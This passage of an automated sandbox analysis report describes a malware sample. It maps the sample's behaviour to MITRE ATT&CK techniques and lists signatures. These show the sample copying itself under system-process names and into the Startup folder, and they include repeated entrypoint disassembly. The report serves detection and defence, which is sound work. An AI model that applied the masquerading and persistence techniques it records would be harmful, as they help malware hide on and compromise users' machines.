"attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "malicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe to new location C:\\D3_08.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.pif to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.pif to new location C:\\D3_08.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.pif to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.scr to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.scr to new location C:\\D3_08.exe (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CopyFileA\" to copy C:\\\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005136)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4669.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4994.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrD3_08.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67EE4992.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67EE4667.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"services.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"shell.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Empty.pif\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], 